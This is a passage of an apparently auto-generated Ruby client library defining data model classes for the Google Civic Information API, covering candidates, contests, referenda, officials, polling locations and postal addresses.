attr_accessor :correspondence_address
# A URL provided by this administrative body for looking up general election
# information.
# Corresponds to the JSON property `electionInfoUrl`
# @return [String]
attr_accessor :election_info_url
# The election officials for this election administrative body.
# Corresponds to the JSON property `electionOfficials`
# @return [Array<Google::Apis::CivicinfoV2::ElectionOfficial>]
attr_accessor :election_officials
# A URL provided by this administrative body for confirming that the voter is
# registered to vote.
# Corresponds to the JSON property `electionRegistrationConfirmationUrl`
# @return [String]
attr_accessor :election_registration_confirmation_url
# A URL provided by this administrative body for looking up how to register to
# vote.
# Corresponds to the JSON property `electionRegistrationUrl`
# @return [String]
attr_accessor :election_registration_url
# A URL provided by this administrative body describing election rules to the
# voter.
# Corresponds to the JSON property `electionRulesUrl`
# @return [String]
attr_accessor :election_rules_url
# A description of the hours of operation for this administrative body.
# Corresponds to the JSON property `hoursOfOperation`
# @return [String]
attr_accessor :hours_of_operation
# The name of this election administrative body.
# Corresponds to the JSON property `name`
# @return [String]
attr_accessor :name
# A simple representation of an address.
# Corresponds to the JSON property `physicalAddress`
# @return [Google::Apis::CivicinfoV2::SimpleAddressType]
attr_accessor :physical_address
# A description of the services this administrative body may provide.
# Corresponds to the JSON property `voter_services`
# @return [Array<String>]
attr_accessor :voter_services
# A URL provided by this administrative body for looking up where to vote.
# Corresponds to the JSON property `votingLocationFinderUrl`
# @return [String]
attr_accessor :voting_location_finder_url
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@absentee_voting_info_url = args[:absentee_voting_info_url] if args.key?(:absentee_voting_info_url)
@address_lines = args[:address_lines] if args.key?(:address_lines)
@ballot_info_url = args[:ballot_info_url] if args.key?(:ballot_info_url)
@correspondence_address = args[:correspondence_address] if args.key?(:correspondence_address)
@election_info_url = args[:election_info_url] if args.key?(:election_info_url)
@election_officials = args[:election_officials] if args.key?(:election_officials)
@election_registration_confirmation_url = args[:election_registration_confirmation_url] if args.key?(:election_registration_confirmation_url)
@election_registration_url = args[:election_registration_url] if args.key?(:election_registration_url)
@election_rules_url = args[:election_rules_url] if args.key?(:election_rules_url)
@hours_of_operation = args[:hours_of_operation] if args.key?(:hours_of_operation)
@name = args[:name] if args.key?(:name)
@physical_address = args[:physical_address] if args.key?(:physical_address)
@voter_services = args[:voter_services] if args.key?(:voter_services)
@voting_location_finder_url = args[:voting_location_finder_url] if args.key?(:voting_location_finder_url)
end
end
# Information about a candidate running for elected office.
class Candidate
include Google::Apis::Core::Hashable
# The URL for the candidate's campaign web site.
# Corresponds to the JSON property `candidateUrl`
# @return [String]
attr_accessor :candidate_url
# A list of known (social) media channels for this candidate.
# Corresponds to the JSON property `channels`
# @return [Array<Google::Apis::CivicinfoV2::Channel>]
attr_accessor :channels
# The email address for the candidate's campaign.
# Corresponds to the JSON property `email`
# @return [String]
attr_accessor :email
# The candidate's name. If this is a joint ticket it will indicate the name of
# the candidate at the top of a ticket followed by a / and that name of
# candidate at the bottom of the ticket. e.g. "Mitt Romney / Paul Ryan"
# Corresponds to the JSON property `name`
# @return [String]
attr_accessor :name
# The order the candidate appears on the ballot for this contest.
# Corresponds to the JSON property `orderOnBallot`
# @return [String]
attr_accessor :order_on_ballot
# The full name of the party the candidate is a member of.
# Corresponds to the JSON property `party`
# @return [String]
attr_accessor :party
# The voice phone number for the candidate's campaign office.
# Corresponds to the JSON property `phone`
# @return [String]
attr_accessor :phone
# A URL for a photo of the candidate.
# Corresponds to the JSON property `photoUrl`
# @return [String]
attr_accessor :photo_url
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@candidate_url = args[:candidate_url] if args.key?(:candidate_url)
@channels = args[:channels] if args.key?(:channels)
@email = args[:email] if args.key?(:email)
@name = args[:name] if args.key?(:name)
@order_on_ballot = args[:order_on_ballot] if args.key?(:order_on_ballot)
@party = args[:party] if args.key?(:party)
@phone = args[:phone] if args.key?(:phone)
@photo_url = args[:photo_url] if args.key?(:photo_url)
end
end
# A social media or web channel for a candidate.
class Channel
include Google::Apis::Core::Hashable
# The unique public identifier for the candidate's channel.
# Corresponds to the JSON property `id`
# @return [String]
attr_accessor :id
# The type of channel. The following is a list of types of channels, but is not
# exhaustive. More channel types may be added at a later time. One of:
# GooglePlus, YouTube, Facebook, Twitter
# Corresponds to the JSON property `type`
# @return [String]
attr_accessor :type
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@id = args[:id] if args.key?(:id)
@type = args[:type] if args.key?(:type)
end
end
# Information about a contest that appears on a voter's ballot.
class Contest
include Google::Apis::Core::Hashable
# A number specifying the position of this contest on the voter's ballot.
# Corresponds to the JSON property `ballotPlacement`
# @return [String]
attr_accessor :ballot_placement
# The candidate choices for this contest.
# Corresponds to the JSON property `candidates`
# @return [Array<Google::Apis::CivicinfoV2::Candidate>]
attr_accessor :candidates
# Describes the geographic scope of a contest.
# Corresponds to the JSON property `district`
# @return [Google::Apis::CivicinfoV2::ElectoralDistrict]
attr_accessor :district
# A description of any additional eligibility requirements for voting in this
# contest.
# Corresponds to the JSON property `electorateSpecifications`
# @return [String]
attr_accessor :electorate_specifications
# An ID for this object. IDs may change in future requests and should not be
# cached. Access to this field requires special access that can be requested
# from the Request more link on the Quotas page.
# Corresponds to the JSON property `id`
# @return [String]
attr_accessor :id
# The levels of government of the office for this contest. There may be more
# than one in cases where a jurisdiction effectively acts at two different
# levels of government; for example, the mayor of the District of Columbia acts
# at "locality" level, but also effectively at both "administrative-area-2" and "
# administrative-area-1".
# Corresponds to the JSON property `level`
# @return [Array<String>]
attr_accessor :level
# The number of candidates that will be elected to office in this contest.
# Corresponds to the JSON property `numberElected`
# @return [String]
attr_accessor :number_elected
# The number of candidates that a voter may vote for in this contest.
# Corresponds to the JSON property `numberVotingFor`
# @return [String]
attr_accessor :number_voting_for
# The name of the office for this contest.
# Corresponds to the JSON property `office`
# @return [String]
attr_accessor :office
# If this is a partisan election, the name of the party it is for.
# Corresponds to the JSON property `primaryParty`
# @return [String]
attr_accessor :primary_party
# The set of ballot responses for the referendum. A ballot response represents a
# line on the ballot. Common examples might include "yes" or "no" for referenda.
# This field is only populated for contests of type 'Referendum'.
# Corresponds to the JSON property `referendumBallotResponses`
# @return [Array<String>]
attr_accessor :referendum_ballot_responses
# Specifies a short summary of the referendum that is typically on the ballot
# below the title but above the text. This field is only populated for contests
# of type 'Referendum'.
# Corresponds to the JSON property `referendumBrief`
# @return [String]
attr_accessor :referendum_brief
# A statement in opposition to the referendum. It does not necessarily appear on
# the ballot. This field is only populated for contests of type 'Referendum'.
# Corresponds to the JSON property `referendumConStatement`
# @return [String]
attr_accessor :referendum_con_statement
# Specifies what effect abstaining (not voting) on the proposition will have (i.
# e. whether abstaining is considered a vote against it). This field is only
# populated for contests of type 'Referendum'.
# Corresponds to the JSON property `referendumEffectOfAbstain`
# @return [String]
attr_accessor :referendum_effect_of_abstain
# The threshold of votes that the referendum needs in order to pass, e.g. "two-
# thirds". This field is only populated for contests of type 'Referendum'.
# Corresponds to the JSON property `referendumPassageThreshold`
# @return [String]
attr_accessor :referendum_passage_threshold
# A statement in favor of the referendum. It does not necessarily appear on the
# ballot. This field is only populated for contests of type 'Referendum'.
# Corresponds to the JSON property `referendumProStatement`
# @return [String]
attr_accessor :referendum_pro_statement
# A brief description of the referendum. This field is only populated for
# contests of type 'Referendum'.
# Corresponds to the JSON property `referendumSubtitle`
# @return [String]
attr_accessor :referendum_subtitle
# The full text of the referendum. This field is only populated for contests of
# type 'Referendum'.
# Corresponds to the JSON property `referendumText`
# @return [String]
attr_accessor :referendum_text
# The title of the referendum (e.g. 'Proposition 42'). This field is only
# populated for contests of type 'Referendum'.
# Corresponds to the JSON property `referendumTitle`
# @return [String]
attr_accessor :referendum_title
# A link to the referendum. This field is only populated for contests of type '
# Referendum'.
# Corresponds to the JSON property `referendumUrl`
# @return [String]
attr_accessor :referendum_url
# The roles which this office fulfills.
# Corresponds to the JSON property `roles`
# @return [Array<String>]
attr_accessor :roles
# A list of sources for this contest. If multiple sources are listed, the data
# has been aggregated from those sources.
# Corresponds to the JSON property `sources`
# @return [Array<Google::Apis::CivicinfoV2::Source>]
attr_accessor :sources
# "Yes" or "No" depending on whether this a contest being held outside the
# normal election cycle.
# Corresponds to the JSON property `special`
# @return [String]
attr_accessor :special
# The type of contest. Usually this will be 'General', 'Primary', or 'Run-off'
# for contests with candidates. For referenda this will be 'Referendum'. For
# Retention contests this will typically be 'Retention'.
# Corresponds to the JSON property `type`
# @return [String]
attr_accessor :type
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@ballot_placement = args[:ballot_placement] if args.key?(:ballot_placement)
@candidates = args[:candidates] if args.key?(:candidates)
@district = args[:district] if args.key?(:district)
@electorate_specifications = args[:electorate_specifications] if args.key?(:electorate_specifications)
@id = args[:id] if args.key?(:id)
@level = args[:level] if args.key?(:level)
@number_elected = args[:number_elected] if args.key?(:number_elected)
@number_voting_for = args[:number_voting_for] if args.key?(:number_voting_for)
@office = args[:office] if args.key?(:office)
@primary_party = args[:primary_party] if args.key?(:primary_party)
@referendum_ballot_responses = args[:referendum_ballot_responses] if args.key?(:referendum_ballot_responses)
@referendum_brief = args[:referendum_brief] if args.key?(:referendum_brief)
@referendum_con_statement = args[:referendum_con_statement] if args.key?(:referendum_con_statement)
@referendum_effect_of_abstain = args[:referendum_effect_of_abstain] if args.key?(:referendum_effect_of_abstain)
@referendum_passage_threshold = args[:referendum_passage_threshold] if args.key?(:referendum_passage_threshold)
@referendum_pro_statement = args[:referendum_pro_statement] if args.key?(:referendum_pro_statement)
@referendum_subtitle = args[:referendum_subtitle] if args.key?(:referendum_subtitle)
@referendum_text = args[:referendum_text] if args.key?(:referendum_text)
@referendum_title = args[:referendum_title] if args.key?(:referendum_title)
@referendum_url = args[:referendum_url] if args.key?(:referendum_url)
@roles = args[:roles] if args.key?(:roles)
@sources = args[:sources] if args.key?(:sources)
@special = args[:special] if args.key?(:special)
@type = args[:type] if args.key?(:type)
end
end
#
class ContextParams
include Google::Apis::Core::Hashable
#
# Corresponds to the JSON property `clientProfile`
# @return [String]
attr_accessor :client_profile
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@client_profile = args[:client_profile] if args.key?(:client_profile)
end
end
# A request to look up representative information for a single division.
class DivisionRepresentativeInfoRequest
include Google::Apis::Core::Hashable
#
# Corresponds to the JSON property `contextParams`
# @return [Google::Apis::CivicinfoV2::ContextParams]
attr_accessor :context_params
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@context_params = args[:context_params] if args.key?(:context_params)
end
end
# A search request for political geographies.
class DivisionSearchRequest
include Google::Apis::Core::Hashable
#
# Corresponds to the JSON property `contextParams`
# @return [Google::Apis::CivicinfoV2::ContextParams]
attr_accessor :context_params
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@context_params = args[:context_params] if args.key?(:context_params)
end
end
# The result of a division search query.
class DivisionSearchResponse
include Google::Apis::Core::Hashable
# Identifies what kind of resource this is. Value: the fixed string "civicinfo#
# divisionSearchResponse".
# Corresponds to the JSON property `kind`
# @return [String]
attr_accessor :kind
#
# Corresponds to the JSON property `results`
# @return [Array<Google::Apis::CivicinfoV2::DivisionSearchResult>]
attr_accessor :results
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@kind = args[:kind] if args.key?(:kind)
@results = args[:results] if args.key?(:results)
end
end
# Represents a political geographic division that matches the requested query.
class DivisionSearchResult
include Google::Apis::Core::Hashable
# Other Open Civic Data identifiers that refer to the same division -- for
# example, those that refer to other political divisions whose boundaries are
# defined to be coterminous with this one. For example, ocd-division/country:us/
# state:wy will include an alias of ocd-division/country:us/state:wy/cd:1, since
# Wyoming has only one Congressional district.
# Corresponds to the JSON property `aliases`
# @return [Array<String>]
attr_accessor :aliases
# The name of the division.
# Corresponds to the JSON property `name`
# @return [String]
attr_accessor :name
# The unique Open Civic Data identifier for this division.
# Corresponds to the JSON property `ocdId`
# @return [String]
attr_accessor :ocd_id
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@aliases = args[:aliases] if args.key?(:aliases)
@name = args[:name] if args.key?(:name)
@ocd_id = args[:ocd_id] if args.key?(:ocd_id)
end
end
# Information about the election that was queried.
class Election
include Google::Apis::Core::Hashable
# Day of the election in YYYY-MM-DD format.
# Corresponds to the JSON property `electionDay`
# @return [String]
attr_accessor :election_day
# The unique ID of this election.
# Corresponds to the JSON property `id`
# @return [String]
attr_accessor :id
# A displayable name for the election.
# Corresponds to the JSON property `name`
# @return [String]
attr_accessor :name
# The political division of the election. Represented as an OCD Division ID.
# Voters within these political jurisdictions are covered by this election. This
# is typically a state such as ocd-division/country:us/state:ca or for the
# midterms or general election the entire US (i.e. ocd-division/country:us).
# Corresponds to the JSON property `ocdDivisionId`
# @return [String]
attr_accessor :ocd_division_id
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@election_day = args[:election_day] if args.key?(:election_day)
@id = args[:id] if args.key?(:id)
@name = args[:name] if args.key?(:name)
@ocd_division_id = args[:ocd_division_id] if args.key?(:ocd_division_id)
end
end
# Information about individual election officials.
class ElectionOfficial
include Google::Apis::Core::Hashable
# The email address of the election official.
# Corresponds to the JSON property `emailAddress`
# @return [String]
attr_accessor :email_address
# The fax number of the election official.
# Corresponds to the JSON property `faxNumber`
# @return [String]
attr_accessor :fax_number
# The full name of the election official.
# Corresponds to the JSON property `name`
# @return [String]
attr_accessor :name
# The office phone number of the election official.
# Corresponds to the JSON property `officePhoneNumber`
# @return [String]
attr_accessor :office_phone_number
# The title of the election official.
# Corresponds to the JSON property `title`
# @return [String]
attr_accessor :title
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@email_address = args[:email_address] if args.key?(:email_address)
@fax_number = args[:fax_number] if args.key?(:fax_number)
@name = args[:name] if args.key?(:name)
@office_phone_number = args[:office_phone_number] if args.key?(:office_phone_number)
@title = args[:title] if args.key?(:title)
end
end
#
class ElectionsQueryRequest
include Google::Apis::Core::Hashable
#
# Corresponds to the JSON property `contextParams`
# @return [Google::Apis::CivicinfoV2::ContextParams]
attr_accessor :context_params
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@context_params = args[:context_params] if args.key?(:context_params)
end
end
# The list of elections available for this version of the API.
class QueryElectionsResponse
include Google::Apis::Core::Hashable
# A list of available elections
# Corresponds to the JSON property `elections`
# @return [Array<Google::Apis::CivicinfoV2::Election>]
attr_accessor :elections
# Identifies what kind of resource this is. Value: the fixed string "civicinfo#
# electionsQueryResponse".
# Corresponds to the JSON property `kind`
# @return [String]
attr_accessor :kind
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@elections = args[:elections] if args.key?(:elections)
@kind = args[:kind] if args.key?(:kind)
end
end
# Describes the geographic scope of a contest.
class ElectoralDistrict
include Google::Apis::Core::Hashable
# An identifier for this district, relative to its scope. For example, the 34th
# State Senate district would have id "34" and a scope of stateUpper.
# Corresponds to the JSON property `id`
# @return [String]
attr_accessor :id
#
# Corresponds to the JSON property `kgForeignKey`
# @return [String]
attr_accessor :kg_foreign_key
# The name of the district.
# Corresponds to the JSON property `name`
# @return [String]
attr_accessor :name
# The geographic scope of this district. If unspecified the district's geography
# is not known. One of: national, statewide, congressional, stateUpper,
# stateLower, countywide, judicial, schoolBoard, cityWide, township,
# countyCouncil, cityCouncil, ward, special
# Corresponds to the JSON property `scope`
# @return [String]
attr_accessor :scope
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@id = args[:id] if args.key?(:id)
@kg_foreign_key = args[:kg_foreign_key] if args.key?(:kg_foreign_key)
@name = args[:name] if args.key?(:name)
@scope = args[:scope] if args.key?(:scope)
end
end
# Describes a political geography.
class GeographicDivision
include Google::Apis::Core::Hashable
# Any other valid OCD IDs that refer to the same division.
# Because OCD IDs are meant to be human-readable and at least somewhat
# predictable, there are occasionally several identifiers for a single division.
# These identifiers are defined to be equivalent to one another, and one is
# always indicated as the primary identifier. The primary identifier will be
# returned in ocd_id above, and any other equivalent valid identifiers will be
# returned in this list.
# For example, if this division's OCD ID is ocd-division/country:us/district:dc,
# this will contain ocd-division/country:us/state:dc.
# Corresponds to the JSON property `alsoKnownAs`
# @return [Array<String>]
attr_accessor :also_known_as
# The name of the division.
# Corresponds to the JSON property `name`
# @return [String]
attr_accessor :name
# List of indices in the offices array, one for each office elected from this
# division. Will only be present if includeOffices was true (or absent) in the
# request.
# Corresponds to the JSON property `officeIndices`
# @return [Array<Fixnum>]
attr_accessor :office_indices
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@also_known_as = args[:also_known_as] if args.key?(:also_known_as)
@name = args[:name] if args.key?(:name)
@office_indices = args[:office_indices] if args.key?(:office_indices)
end
end
# Information about an Office held by one or more Officials.
class Office
include Google::Apis::Core::Hashable
# The OCD ID of the division with which this office is associated.
# Corresponds to the JSON property `divisionId`
# @return [String]
attr_accessor :division_id
# The levels of government of which this office is part. There may be more than
# one in cases where a jurisdiction effectively acts at two different levels of
# government; for example, the mayor of the District of Columbia acts at "
# locality" level, but also effectively at both "administrative-area-2" and "
# administrative-area-1".
# Corresponds to the JSON property `levels`
# @return [Array<String>]
attr_accessor :levels
# The human-readable name of the office.
# Corresponds to the JSON property `name`
# @return [String]
attr_accessor :name
# List of indices in the officials array of people who presently hold this
# office.
# Corresponds to the JSON property `officialIndices`
# @return [Array<Fixnum>]
attr_accessor :official_indices
# The roles which this office fulfills. Roles are not meant to be exhaustive, or
# to exactly specify the entire set of responsibilities of a given office, but
# are meant to be rough categories that are useful for general selection from or
# sorting of a list of offices.
# Corresponds to the JSON property `roles`
# @return [Array<String>]
attr_accessor :roles
# A list of sources for this office. If multiple sources are listed, the data
# has been aggregated from those sources.
# Corresponds to the JSON property `sources`
# @return [Array<Google::Apis::CivicinfoV2::Source>]
attr_accessor :sources
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@division_id = args[:division_id] if args.key?(:division_id)
@levels = args[:levels] if args.key?(:levels)
@name = args[:name] if args.key?(:name)
@official_indices = args[:official_indices] if args.key?(:official_indices)
@roles = args[:roles] if args.key?(:roles)
@sources = args[:sources] if args.key?(:sources)
end
end
# Information about a person holding an elected office.
class Official
include Google::Apis::Core::Hashable
# Addresses at which to contact the official.
# Corresponds to the JSON property `address`
# @return [Array<Google::Apis::CivicinfoV2::SimpleAddressType>]
attr_accessor :address
# A list of known (social) media channels for this official.
# Corresponds to the JSON property `channels`
# @return [Array<Google::Apis::CivicinfoV2::Channel>]
attr_accessor :channels
# The direct email addresses for the official.
# Corresponds to the JSON property `emails`
# @return [Array<String>]
attr_accessor :emails
# The official's name.
# Corresponds to the JSON property `name`
# @return [String]
attr_accessor :name
# The full name of the party the official belongs to.
# Corresponds to the JSON property `party`
# @return [String]
attr_accessor :party
# The official's public contact phone numbers.
# Corresponds to the JSON property `phones`
# @return [Array<String>]
attr_accessor :phones
# A URL for a photo of the official.
# Corresponds to the JSON property `photoUrl`
# @return [String]
attr_accessor :photo_url
# The official's public website URLs.
# Corresponds to the JSON property `urls`
# @return [Array<String>]
attr_accessor :urls
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@address = args[:address] if args.key?(:address)
@channels = args[:channels] if args.key?(:channels)
@emails = args[:emails] if args.key?(:emails)
@name = args[:name] if args.key?(:name)
@party = args[:party] if args.key?(:party)
@phones = args[:phones] if args.key?(:phones)
@photo_url = args[:photo_url] if args.key?(:photo_url)
@urls = args[:urls] if args.key?(:urls)
end
end
# A location where a voter can vote. This may be an early vote site, an election
# day voting location, or a drop off location for a completed ballot.
class PollingLocation
include Google::Apis::Core::Hashable
# A simple representation of an address.
# Corresponds to the JSON property `address`
# @return [Google::Apis::CivicinfoV2::SimpleAddressType]
attr_accessor :address
# The last date that this early vote site or drop off location may be used. This
# field is not populated for polling locations.
# Corresponds to the JSON property `endDate`
# @return [String]
attr_accessor :end_date
# An ID for this object. IDs may change in future requests and should not be
# cached. Access to this field requires special access that can be requested
# from the Request more link on the Quotas page.
# Corresponds to the JSON property `id`
# @return [String]
attr_accessor :id
# The name of the early vote site or drop off location. This field is not
# populated for polling locations.
# Corresponds to the JSON property `name`
# @return [String]
attr_accessor :name
# Notes about this location (e.g. accessibility ramp or entrance to use).
# Corresponds to the JSON property `notes`
# @return [String]
attr_accessor :notes
# A description of when this location is open.
# Corresponds to the JSON property `pollingHours`
# @return [String]
attr_accessor :polling_hours
# A list of sources for this location. If multiple sources are listed the data
# has been aggregated from those sources.
# Corresponds to the JSON property `sources`
# @return [Array<Google::Apis::CivicinfoV2::Source>]
attr_accessor :sources
# The first date that this early vote site or drop off location may be used.
# This field is not populated for polling locations.
# Corresponds to the JSON property `startDate`
# @return [String]
attr_accessor :start_date
# The services provided by this early vote site or drop off location. This field
# is not populated for polling locations.
# Corresponds to the JSON property `voterServices`
# @return [String]
attr_accessor :voter_services
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@address = args[:address] if args.key?(:address)
@end_date = args[:end_date] if args.key?(:end_date)
@id = args[:id] if args.key?(:id)
@name = args[:name] if args.key?(:name)
@notes = args[:notes] if args.key?(:notes)
@polling_hours = args[:polling_hours] if args.key?(:polling_hours)
@sources = args[:sources] if args.key?(:sources)
@start_date = args[:start_date] if args.key?(:start_date)
@voter_services = args[:voter_services] if args.key?(:voter_services)
end
end
#
class PostalAddress
include Google::Apis::Core::Hashable
#
# Corresponds to the JSON property `addressLines`
# @return [Array<String>]
attr_accessor :address_lines
#
# Corresponds to the JSON property `administrativeAreaName`
# @return [String]
attr_accessor :administrative_area_name
#
# Corresponds to the JSON property `countryName`
# @return [String]
attr_accessor :country_name
#
# Corresponds to the JSON property `countryNameCode`
# @return [String]
attr_accessor :country_name_code
#
# Corresponds to the JSON property `dependentLocalityName`
# @return [String]
attr_accessor :dependent_locality_name
#
# Corresponds to the JSON property `dependentThoroughfareLeadingType`
# @return [String]
attr_accessor :dependent_thoroughfare_leading_type
#
# Corresponds to the JSON property `dependentThoroughfareName`
# @return [String]
attr_accessor :dependent_thoroughfare_name
#
# Corresponds to the JSON property `dependentThoroughfarePostDirection`
# @return [String]
attr_accessor :dependent_thoroughfare_post_direction
#
# Corresponds to the JSON property `dependentThoroughfarePreDirection`
# @return [String]
attr_accessor :dependent_thoroughfare_pre_direction
#
# Corresponds to the JSON property `dependentThoroughfareTrailingType`
# @return [String]
attr_accessor :dependent_thoroughfare_trailing_type
#
# Corresponds to the JSON property `dependentThoroughfaresConnector`
# @return [String]
attr_accessor :dependent_thoroughfares_connector
#
# Corresponds to the JSON property `dependentThoroughfaresIndicator`
# @return [String]
attr_accessor :dependent_thoroughfares_indicator
#
# Corresponds to the JSON property `dependentThoroughfaresType`
# @return [String]
attr_accessor :dependent_thoroughfares_type
#
# Corresponds to the JSON property `firmName`
# @return [String]
attr_accessor :firm_name
#
# Corresponds to the JSON property `isDisputed`
# @return [Boolean]
attr_accessor :is_disputed
alias_method :is_disputed?, :is_disputed
#
# Corresponds to the JSON property `languageCode`
# @return [String]
attr_accessor :language_code
#
# Corresponds to the JSON property `localityName`
# @return [String]
attr_accessor :locality_name
#
# Corresponds to the JSON property `postBoxNumber`
# @return [String]
attr_accessor :post_box_number
#
# Corresponds to the JSON property `postalCodeNumber`
# @return [String]
attr_accessor :postal_code_number
#
# Corresponds to the JSON property `postalCodeNumberExtension`
# @return [String]
attr_accessor :postal_code_number_extension
#
# Corresponds to the JSON property `premiseName`
# @return [String]
attr_accessor :premise_name
#
# Corresponds to the JSON property `recipientName`
# @return [String]
attr_accessor :recipient_name
#
# Corresponds to the JSON property `sortingCode`
# @return [String]
attr_accessor :sorting_code
#
# Corresponds to the JSON property `subAdministrativeAreaName`
# @return [String]
attr_accessor :sub_administrative_area_name
#
# Corresponds to the JSON property `subPremiseName`
# @return [String]
attr_accessor :sub_premise_name
#
# Corresponds to the JSON property `thoroughfareLeadingType`
# @return [String]
attr_accessor :thoroughfare_leading_type
#
# Corresponds to the JSON property `thoroughfareName`
# @return [String]
attr_accessor :thoroughfare_name
#
# Corresponds to the JSON property `thoroughfareNumber`
# @return [String]
attr_accessor :thoroughfare_number
#
# Corresponds to the JSON property `thoroughfarePostDirection`
# @return [String]
attr_accessor :thoroughfare_post_direction
#
# Corresponds to the JSON property `thoroughfarePreDirection`
# @return [String]
attr_accessor :thoroughfare_pre_direction
#
# Corresponds to the JSON property `thoroughfareTrailingType`
# @return [String]
attr_accessor :thoroughfare_trailing_type
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@address_lines = args[:address_lines] if args.key?(:address_lines)
@administrative_area_name = args[:administrative_area_name] if args.key?(:administrative_area_name)
@country_name = args[:country_name] if args.key?(:country_name)
@country_name_code = args[:country_name_code] if args.key?(:country_name_code)
@dependent_locality_name = args[:dependent_locality_name] if args.key?(:dependent_locality_name)
@dependent_thoroughfare_leading_type = args[:dependent_thoroughfare_leading_type] if args.key?(:dependent_thoroughfare_leading_type)
@dependent_thoroughfare_name = args[:dependent_thoroughfare_name] if args.key?(:dependent_thoroughfare_name)
@dependent_thoroughfare_post_direction = args[:dependent_thoroughfare_post_direction] if args.key?(:dependent_thoroughfare_post_direction)
@dependent_thoroughfare_pre_direction = args[:dependent_thoroughfare_pre_direction] if args.key?(:dependent_thoroughfare_pre_direction)
@dependent_thoroughfare_trailing_type = args[:dependent_thoroughfare_trailing_type] if args.key?(:dependent_thoroughfare_trailing_type)
@dependent_thoroughfares_connector = args[:dependent_thoroughfares_connector] if args.key?(:dependent_thoroughfares_connector)
@dependent_thoroughfares_indicator = args[:dependent_thoroughfares_indicator] if args.key?(:dependent_thoroughfares_indicator)
@dependent_thoroughfares_type = args[:dependent_thoroughfares_type] if args.key?(:dependent_thoroughfares_type)
@firm_name = args[:firm_name] if args.key?(:firm_name)
@is_disputed = args[:is_disputed] if args.key?(:is_disputed)
@language_code = args[:language_code] if args.key?(:language_code)
@locality_name = args[:locality_name] if args.key?(:locality_name)
@post_box_number = args[:post_box_number] if args.key?(:post_box_number)
@postal_code_number = args[:postal_code_number] if args.key?(:postal_code_number)
@postal_code_number_extension = args[:postal_code_number_extension] if args.key?(:postal_code_number_extension)
@premise_name = args[:premise_name] if args.key?(:premise_name)
@recipient_name = args[:recipient_name] if args.key?(:recipient_name)
@sorting_code = args[:sorting_code] if args.key?(:sorting_code)
@sub_administrative_area_name = args[:sub_administrative_area_name] if args.key?(:sub_administrative_area_name)
@sub_premise_name = args[:sub_premise_name] if args.key?(:sub_premise_name)
@thoroughfare_leading_type = args[:thoroughfare_leading_type] if args.key?(:thoroughfare_leading_type)
@thoroughfare_name = args[:thoroughfare_name] if args.key?(:thoroughfare_name)
@thoroughfare_number = args[:thoroughfare_number] if args.key?(:thoroughfare_number)
@thoroughfare_post_direction = args[:thoroughfare_post_direction] if args.key?(:thoroughfare_post_direction)
@thoroughfare_pre_direction = args[:thoroughfare_pre_direction] if args.key?(:thoroughfare_pre_direction)
@thoroughfare_trailing_type = args[:thoroughfare_trailing_type] if args.key?(:thoroughfare_trailing_type)
end
end
#
class RepresentativeInfoData
include Google::Apis::Core::Hashable
# Political geographic divisions that contain the requested address.
# Corresponds to the JSON property `divisions`
# @return [Hash<String,Google::Apis::CivicinfoV2::GeographicDivision>]
attr_accessor :divisions
# Elected offices referenced by the divisions listed above. Will only be present
# if includeOffices was true in the request.
# Corresponds to the JSON property `offices`
# @return [Array<Google::Apis::CivicinfoV2::Office>]
attr_accessor :offices
# Officials holding the offices listed above. Will only be present if
# includeOffices was true in the request.
# Corresponds to the JSON property `officials`
# @return [Array<Google::Apis::CivicinfoV2::Official>]
attr_accessor :officials
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@divisions = args[:divisions] if args.key?(:divisions)
@offices = args[:offices] if args.key?(:offices)
@officials = args[:officials] if args.key?(:officials)
end
end
# A request for political geography and representative information for an
# address.
class RepresentativeInfoRequest
include Google::Apis::Core::Hashable
#
# Corresponds to the JSON property `contextParams`
# @return [Google::Apis::CivicinfoV2::ContextParams]
attr_accessor :context_params
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@context_params = args[:context_params] if args.key?(:context_params)
end
end
# The result of a representative info lookup query.
class RepresentativeInfoResponse
include Google::Apis::Core::Hashable
# Political geographic divisions that contain the requested address.
# Corresponds to the JSON property `divisions`
# @return [Hash<String,Google::Apis::CivicinfoV2::GeographicDivision>]
attr_accessor :divisions
# Identifies what kind of resource this is. Value: the fixed string "civicinfo#
# representativeInfoResponse".
# Corresponds to the JSON property `kind`
# @return [String]
attr_accessor :kind
# A simple representation of an address.
# Corresponds to the JSON property `normalizedInput`
# @return [Google::Apis::CivicinfoV2::SimpleAddressType]
attr_accessor :normalized_input
# Elected offices referenced by the divisions listed above. Will only be present
# if includeOffices was true in the request.
# Corresponds to the JSON property `offices`
# @return [Array<Google::Apis::CivicinfoV2::Office>]
attr_accessor :offices
# Officials holding the offices listed above. Will only be present if
# includeOffices was true in the request.
# Corresponds to the JSON property `officials`
# @return [Array<Google::Apis::CivicinfoV2::Official>]
attr_accessor :officials
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@divisions = args[:divisions] if args.key?(:divisions)
@kind = args[:kind] if args.key?(:kind)
@normalized_input = args[:normalized_input] if args.key?(:normalized_input)
@offices = args[:offices] if args.key?(:offices)
@officials = args[:officials] if args.key?(:officials)
end
end
# A simple representation of an address.
class SimpleAddressType
include Google::Apis::Core::Hashable
# The city or town for the address.
# Corresponds to the JSON property `city`
# @return [String]
attr_accessor :city
# The street name and number of this address.
# Corresponds to the JSON property `line1`
